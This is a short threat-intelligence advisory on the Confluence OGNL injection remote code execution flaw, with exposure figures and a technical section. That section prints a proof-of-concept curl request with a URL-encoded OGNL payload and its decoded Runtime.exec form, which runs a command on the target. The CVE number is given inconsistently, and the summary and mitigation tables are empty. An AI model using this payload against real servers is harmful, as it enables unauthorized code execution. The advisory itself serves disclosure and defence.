Originally published at: Unauthenticated Confluence RCE Vulnerability (CVE-2022-26134) Actively Exploited in the Wild - CloudSEK
|
Category:
Vulnerability Intelligence |
Vulnerability Class:
Remote Code Execution |
CVE ID:
CVE-2022-26314 |
CVSS:3.0 Score:
N/A |
|---|
Executive Summary
| THREAT | IMPACT | MITIGATION |
|---|---|---|
|
|
|
Overview of CVE-2022-26314
- CVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability that could lead to remote code execution.
- Due to the public-facing nature of Confluence Servers, the vulnerability poses a high risk of exploitation.
- To exploit the vulnerability, an attacker with network access simply needs to send a specially crafted request to a vulnerable Confluence instance to gain code execution on the target system.
Information from OSINT
- There are at least 9,396 publicly reachable instances of Confluence on the internet.
Source: Shodan
- Mass scale exploitation for this vulnerability has been observed by multiple sources.
Information from DarkWeb
A significant amount of chatter was observed on cybercrime forums and channels regarding this vulnerability.
Cybercrime forum post discussing CVE-2022-26134
Technical Analysis
CVE-2022-26134 is an unauthenticated OGNL injection vulnerability that affects HTTP servers.
- To exploit the vulnerability, the OGNL payload is placed in the URI of an HTTP request, using any valid or invalid HTTP method.
- The attacker-provided URI is translated into a namespace which then finds its way down to OGNL expression evaluation.
curl -v http://{host}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/
Encoded Payload
- The above URL encoded exploit payload contains everything from the start of the content location to the instance of /.
${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")}
Decoded Payload
Impact & Mitigation
| Impact | Mitigation |
|---|---|
|
|